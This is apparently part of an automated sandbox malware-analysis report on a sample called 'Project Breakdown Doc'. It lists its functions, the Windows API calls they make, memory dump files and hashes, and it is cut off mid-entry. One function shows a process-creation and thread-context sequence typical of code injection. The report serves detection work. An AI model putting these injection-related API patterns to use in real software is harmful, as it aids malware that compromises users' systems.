                                                  • Instruction Fuzzy Hash: 7CD05EBA54030DABDB509B90DC0EFAABB2CE704700F0042B1FF94920A1DEB055998B92
                                                  Function 00CBCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce22e0d61c8bd7c77c907064a891b91ced8ef76f1d7027eca573a6086ffea28e
                                                  • Instruction ID: 06141a24c323d042c4e52601743a8f056b1682ba62f744aadf53317fa58b95fd
                                                  • Opcode Fuzzy Hash: ce22e0d61c8bd7c77c907064a891b91ced8ef76f1d7027eca573a6086ffea28e
                                                  • Instruction Fuzzy Hash: CDF139716083519FCB14DF28C484A6ABBE5FF88314F14896EF8AA9B351D731E945CF82
                                                  Function 00C4F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C603D3
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C603DB
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C603E6
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C603F1
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C603F9
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C60401
                                                    • Part of subcall function 00C56259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C4FA90), ref: 00C562B4
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C4FB2D
                                                  • OleInitialize.OLE32(00000000), ref: 00C4FBAA
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C849F2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID:
                                                  • API String ID: 1986988660-0
                                                  • Opcode ID: 8f2a28ac60aaa84f785a013be16b6957c52169abb0bc088f86026ee221e8be4c
                                                  • Instruction ID: d62c25c2b00c9055f6c2a329a1537e28f94764ef119cc0e95543e617b84bbbb1
                                                  • Opcode Fuzzy Hash: 8f2a28ac60aaa84f785a013be16b6957c52169abb0bc088f86026ee221e8be4c
                                                  • Instruction Fuzzy Hash: 1681A7B09093508EC784DF3AED947197AE5FB89708714812EE41CC73A2EB71C4698F71
                                                  Function 00C443DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C44401
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C444A6
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C444C3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$_memset
                                                  • String ID:
                                                  • API String ID: 1505330794-0
                                                  • Opcode ID: 95a5f1d475b2dcd25f0eb1fbf817d2379787067062a61a73c6410cfea41440ca
                                                  • Instruction ID: d9ed318300284b5f996fcf0b8d3b97c62cb9c7dadeb9074183a8fd3d844f7c2b
                                                  • Opcode Fuzzy Hash: 95a5f1d475b2dcd25f0eb1fbf817d2379787067062a61a73c6410cfea41440ca
                                                  • Instruction Fuzzy Hash: 76317AB05057018FD724DF34D884B9BBBE8FB48308F10092EF59AC2241E7B1AA48CB96
                                                  Function 00C6594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 00C65963
                                                    • Part of subcall function 00C6A3AB: __NMSG_WRITE.LIBCMT ref: 00C6A3D2
                                                    • Part of subcall function 00C6A3AB: __NMSG_WRITE.LIBCMT ref: 00C6A3DC
                                                  • __NMSG_WRITE.LIBCMT ref: 00C6596A
                                                    • Part of subcall function 00C6A408: GetModuleFileNameW.KERNEL32(00000000,00D043BA,00000104,?,00000001,00000000), ref: 00C6A49A
                                                    • Part of subcall function 00C6A408: ___crtMessageBoxW.LIBCMT ref: 00C6A548
                                                    • Part of subcall function 00C632DF: ___crtCorExitProcess.LIBCMT ref: 00C632E5
                                                    • Part of subcall function 00C632DF: ExitProcess.KERNEL32 ref: 00C632EE
                                                    • Part of subcall function 00C68D68: __getptd_noexit.LIBCMT ref: 00C68D68
                                                  • RtlAllocateHeap.NTDLL(01790000,00000000,00000001,00000000,?,?,?,00C61013,?), ref: 00C6598F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: b81363cea5e79f2f22ff7130f7b07bd98f4c50c010c462b1077498edd601b27f
                                                  • Instruction ID: 90dd220d05059aafb950dd00ce667e899109537afdf8482f2e2853beacefb13b
                                                  • Opcode Fuzzy Hash: b81363cea5e79f2f22ff7130f7b07bd98f4c50c010c462b1077498edd601b27f
                                                  • Instruction Fuzzy Hash: 53019E31345B16DEE6313B75ECC2B6E72989F42770F20012AF615AB2D2DE709E42A674
                                                  Function 00CA9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CA97D2,?,?,?,?,?,00000004), ref: 00CA9B45
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CA97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CA9B5B
                                                  • CloseHandle.KERNEL32(00000000,?,00CA97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CA9B62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: 46c720a0750d75dcb252e3ff98f564682847011c66898fb480810d5dc381dc53
                                                  • Instruction ID: c1e2b35552745993a985c0f0346a37919d891e185b023d244ee2e2b25fe9711e
                                                  • Opcode Fuzzy Hash: 46c720a0750d75dcb252e3ff98f564682847011c66898fb480810d5dc381dc53
                                                  • Instruction Fuzzy Hash: 78E08632180214B7EB321B54EC0AFDE7B19EB05765F144124FB24690E087B126129798
                                                  Function 00CA8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00CA8FA5
                                                    • Part of subcall function 00C62F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00C69C64), ref: 00C62FA9
                                                    • Part of subcall function 00C62F95: GetLastError.KERNEL32(00000000,?,00C69C64), ref: 00C62FBB
                                                  • _free.LIBCMT ref: 00CA8FB6
                                                  • _free.LIBCMT ref: 00CA8FC8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                  • Instruction ID: 739142cea1501ac0651de27ea3c03b7ee283d8e038e20f63d231e108aeee8178
                                                  • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                  • Instruction Fuzzy Hash: 35E0C2A1A08B134FCA30A5F8AD80A8357EE0F48351708080DB419DB142CE24E940A024
                                                  Function 00C4AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CALL
                                                  • API String ID: 0-4196123274
                                                  • Opcode ID: bb8a99ba5690644483501b3e3b79b8633bcb290305ddb931f3928a47041a9e62
                                                  • Instruction ID: f77f52b4000ba522e8328a928325026dfd95738df0200ddde0313ac3b432550c
                                                  • Opcode Fuzzy Hash: bb8a99ba5690644483501b3e3b79b8633bcb290305ddb931f3928a47041a9e62
                                                  • Instruction Fuzzy Hash: 70224674508251DFCB24DF14C494B6ABBE1FF84304F19895DE89A8B362D731ED85DB82
                                                  Function 00C44DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: EA06
                                                  • API String ID: 4104443479-3962188686
                                                  • Opcode ID: 34f116816b460528b10248cacb3e93f6a2ecdc77ec1504aa0c0e02c400997872
                                                  • Instruction ID: 2a93053abd24d67e89e3708099ca1d22f420a94aceefcf92dbbb8be80b2b2a2e
                                                  • Opcode Fuzzy Hash: 34f116816b460528b10248cacb3e93f6a2ecdc77ec1504aa0c0e02c400997872
                                                  • Instruction Fuzzy Hash: AC415A71A045586BDF299F64C8917BEFFB6BF05300F784065F982AB283C6319E44A7A1
                                                  Function 00C47BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                                                  • Instruction ID: 97dd8d7c1013ee3b40616ced6c26f53cc9218f52608e5fbbeceb2eb69747b6dc
                                                  • Opcode Fuzzy Hash: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                                                  • Instruction Fuzzy Hash: 1631C5B1604606AFC714DF68D9D1E6AF3A9FF483107158729F929CB391DB70E960CB90
                                                  Function 00C4492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsThemeActive.UXTHEME ref: 00C44992
                                                    • Part of subcall function 00C635AC: __lock.LIBCMT ref: 00C635B2
                                                    • Part of subcall function 00C635AC: DecodePointer.KERNEL32(00000001,?,00C449A7,00C981BC), ref: 00C635BE
                                                    • Part of subcall function 00C635AC: EncodePointer.KERNEL32(?,?,00C449A7,00C981BC), ref: 00C635C9
                                                    • Part of subcall function 00C44A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C44A73
                                                    • Part of subcall function 00C44A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C44A88
                                                    • Part of subcall function 00C43B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C43B7A
                                                    • Part of subcall function 00C43B4C: IsDebuggerPresent.KERNEL32 ref: 00C43B8C
                                                    • Part of subcall function 00C43B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D062F8,00D062E0,?,?), ref: 00C43BFD
                                                    • Part of subcall function 00C43B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00C43C81
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C449D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                  • String ID:
                                                  • API String ID: 1438897964-0
                                                  • Opcode ID: b0201e3e51ed09b6fda58b761f735eaf3ba24d182a5a60108f00e33fefc0a5e6
                                                  • Instruction ID: 3479c7c82652631f446da3af78be065423e413d3580da0443a8ad1ef6738b79c
                                                  • Opcode Fuzzy Hash: b0201e3e51ed09b6fda58b761f735eaf3ba24d182a5a60108f00e33fefc0a5e6
                                                  • Instruction Fuzzy Hash: 4F1167719083119BC700EF69E845A0EBBE8FB98710F00451EF089873A1DBB0D659DBA6
                                                  Function 00C60FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C6594C: __FF_MSGBANNER.LIBCMT ref: 00C65963
                                                    • Part of subcall function 00C6594C: __NMSG_WRITE.LIBCMT ref: 00C6596A
                                                    • Part of subcall function 00C6594C: RtlAllocateHeap.NTDLL(01790000,00000000,00000001,00000000,?,?,?,00C61013,?), ref: 00C6598F
                                                  • std::exception::exception.LIBCMT ref: 00C6102C
                                                  • __CxxThrowException@8.LIBCMT ref: 00C61041
                                                    • Part of subcall function 00C687DB: RaiseException.KERNEL32(?,?,?,00CFBAF8,00000000,?,?,?,?,00C61046,?,00CFBAF8,?,00000001), ref: 00C68830
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 3902256705-0
                                                  • Opcode ID: 35f8803e7ddd8da1c600ba2ae574ad9917ccf3f25575f251a9f145aa863833d4
                                                  • Instruction ID: 34394abc0b04924e539d0b6a4c23033fe05db4e84a330618af32f92773c48e8e
                                                  • Opcode Fuzzy Hash: 35f8803e7ddd8da1c600ba2ae574ad9917ccf3f25575f251a9f145aa863833d4
                                                  • Instruction Fuzzy Hash: E1F0F47450020DA6CF30AA98EC829DF77A89F00351F280026FD04A2281EFB08B84E2E1
                                                  Function 00C655D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C68D68: __getptd_noexit.LIBCMT ref: 00C68D68
                                                  • __lock_file.LIBCMT ref: 00C6561B
                                                    • Part of subcall function 00C66E4E: __lock.LIBCMT ref: 00C66E71
                                                  • __fclose_nolock.LIBCMT ref: 00C65626
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  • Opcode ID: 0224ce2e2d22e0b88d114fd52794df8c83ed306af5e5ebf840766649bba7eddc
                                                  • Instruction ID: b96761dbb707a29c34477ff441b98e6c496995292abb91d5163dd166aab31182
                                                  • Opcode Fuzzy Hash: 0224ce2e2d22e0b88d114fd52794df8c83ed306af5e5ebf840766649bba7eddc
                                                  • Instruction Fuzzy Hash: F8F09AB1800A059ADB30AB79C88276E6AA16F41334F658209B425AB2C1CF7C8A45EB56
                                                  Function 0178129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01781A5B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01781AF1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01781B13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                  • Instruction ID: e76dd18517f145b899fc447d0b049f74bcd650bfff9246cf6cef8e4514b05008
                                                  • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                  • Instruction Fuzzy Hash: B412BD24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CB5A
                                                  Function 00C800D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 28d549a878bb40a0cb5b4dd8be2a37b02d597869621ea4000993c7ff71b68c58
                                                  • Instruction ID: fdeba9e38db3c9c6da7219c2451ad18290d3519b2467366e737eb9a3aaba9bad
                                                  • Opcode Fuzzy Hash: 28d549a878bb40a0cb5b4dd8be2a37b02d597869621ea4000993c7ff71b68c58
                                                  • Instruction Fuzzy Hash: 0F411774508351DFDB24DF14C484B1ABBE1BF45318F1988ACE8A98B762C332EC99CB56
                                                  Function 00C47CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: d6c34f1ff5a4183727190edbcd4833ad14e59be6d6a0f806736ee8a56d2e8aee
                                                  • Instruction ID: f6d45349c2f83eaea2ceaebb8a5e332e7719133e3439a593d14b175e1f0e0d15
                                                  • Opcode Fuzzy Hash: d6c34f1ff5a4183727190edbcd4833ad14e59be6d6a0f806736ee8a56d2e8aee
                                                  • Instruction Fuzzy Hash: A6210D71A08609EBDB208F25EC8277D7BB8FF10390F21C56EE48AC5191EB3095E1E742
                                                  Function 00C44F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C44D13: FreeLibrary.KERNEL32(00000000,?), ref: 00C44D4D
                                                    • Part of subcall function 00C6548B: __wfsopen.LIBCMT ref: 00C65496
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C44F6F
                                                    • Part of subcall function 00C44CC8: FreeLibrary.KERNEL32(00000000), ref: 00C44D02
                                                    • Part of subcall function 00C44DD0: _memmove.LIBCMT ref: 00C44E1A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
